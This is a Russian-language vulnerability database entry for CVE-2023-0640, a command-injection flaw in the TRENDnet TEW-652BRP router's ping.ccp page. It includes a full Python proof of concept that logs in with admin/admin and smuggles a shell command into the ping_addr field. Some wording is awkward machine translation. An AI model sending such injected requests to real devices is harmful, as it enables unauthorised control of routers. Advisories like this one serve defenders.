CVSS Meta Temp Score | Текущая цена эксплуатации (≈) | Балл интереса CTI |
---|---|---|
7.8 | $0-$5k | 0.13 |
Уязвимость была найдена в TRENDnet TEW-652BRP 3.04b01 и классифицирована как критический. Затронута неизвестная функция файла ping.ccp компонента Web Interface. Использование CWE для объявления проблемы приводит к тому, что CWE-77.
Эта уязвимость продается как CVE-2023-0640. Атаку можно осуществить удаленно. Имеются технические подробности. Популярность этой уязвимости ниже среднего. Более того, существует эксплойт. Эксплойт был раскрыт общественности и может быть использован. Текущая цена за эксплойт может составлять около USD $0-$5k в настоящее время. Проект MITRE ATT&CK объявляет технику атаки как T1202.
Объявляется proof-of-concept. Эксплойт доступен для загрузки на сайте vuldb.com. В 0-дневный период предполагаемая подземная цена составляла около $0-$5k. Код, используемый эксплойтом, следующий:
import requests,socket import re import time from urllib.parse import urlencodeusername = 'admin' password = 'admin' device_web_ip = '192.168.10.1' ping_target_ip = '192.168.10.2'
headers = {'Host': '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://{}'.format(device_web_ip), 'Connection': 'keep-alive', 'Referer': 'http://{}/ping_test.htm'.format(device_web_ip), 'Upgrade-Insecure-Requests': '1'}
login_params = 'html_response_page=login_fail.htm&login_name=&username={0}&password={1}&curr_language=0&login_n={0}&login_pass={1}&lang_select=0&login=Login'.format(username,password) login_url = 'http://{}/login.ccp'.format(device_web_ip) r = requests.post(url=login_url, data=login_params, headers=headers, timeout=0.2) if r is None or r.status_code != 200: print('Login wrong, please retry!') exit()
params = { 'ccp_act': 'ping_v4', 'nextPage': 'ping_back.htm', 'html_response_page': 'ping_back.htm', 'html_response_message': 'The+setting+is+saved.', 'html_response_return_page': 'ping_test.htm', 'ping_addr': 'abcd"$(ping -c 1 {})"'.format(ping_target_ip), 'ping': 'Ping', 'deviceList': '', '/friendlyName': '' } method = 'POST' url = 'http://{}/ping.ccp'.format(device_web_ip)
try: r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2) r = requests.request(method=method,url=url,headers=headers,data=params,verify=False,timeout=0.2) except: pass
Продукт
Поставщик
Имя
Версия
Лицензия
CPE 2.3
CPE 2.2
CVSSv4
VulDB CVSS-B Score: 🔍VulDB CVSS-BT Score: 🔍
VulDB Вектор: 🔍
VulDB Надежность: 🔍
CVSSv3
VulDB Meta Base Score: 8.1VulDB Meta Temp Score: 7.8
VulDB Базовый балл: 7.2
VulDB Временная оценка: 6.5
VulDB Вектор: 🔍
VulDB Надежность: 🔍
NVD Базовый балл: 9.8
NVD Вектор: 🔍
CNA Базовый балл: 7.2
CNA Вектор (VulDB): 🔍
CVSSv2
AV | AC | Au | C | I | A |
---|---|---|---|---|---|
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
Вектор | Сложность | Аутентификация | Конфиденциальность | Целостность | Доступность |
---|---|---|---|---|---|
разблокировать | разблокировать | разблокировать | разблокировать | разблокировать | разблокировать |
разблокировать | разблокировать | разблокировать | разблокировать | разблокировать | разблокировать |
разблокировать | разблокировать | разблокировать | разблокировать | разблокировать | разблокировать |
VulDB Базовый балл: 🔍
VulDB Временная оценка: 🔍
VulDB Надежность: 🔍
NVD Базовый балл: 🔍
Эксплуатация
Класс: эскалация привилегийCWE: CWE-77 / CWE-74 / CWE-707
ATT&CK: T1202
Локальный: Нет
Удаленный: Да
Доступность: 🔍
Доступ: публичный
Статус: Proof-of-Concept
Язык программирования: 🔍
Скачать: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
Прогнозирование цены: 🔍
Оценка текущей цены: 🔍
0-Day | разблокировать | разблокировать | разблокировать | разблокировать |
---|---|---|---|---|
Сегодня | разблокировать | разблокировать | разблокировать | разблокировать |
Разведка угроз
Интерес: 🔍Активные акторы: 🔍
Активные группы APT: 🔍
Контрмеры
Рекомендуется: о смягчении не известноСтатус: 🔍
0-дневное время: 🔍
Временная шкала
02.02.2023 🔍02.02.2023 🔍
02.02.2023 🔍
01.03.2023 🔍
Источники
Статус: Не определеноCVE: CVE-2023-0640 (🔍)
scip Labs: https://www.scip.ch/en/?labs.20161013
Вход
Создано: 02.02.2023 09:18Обновлено: 01.03.2023 17:07
Изменения: 02.02.2023 09:18 (39), 02.02.2023 09:19 (2), 01.03.2023 17:01 (2), 01.03.2023 17:07 (28)
Завершить: 🔍
Отправитель: leetsun
Submit
принято
- Submit #77217: Command injection on TRENDnet router TEW-652BRP (по leetsun)
Комментариев пока нет. Языки: ru + en.
Пожалуйста, войдите в систему, чтобы прокомментировать.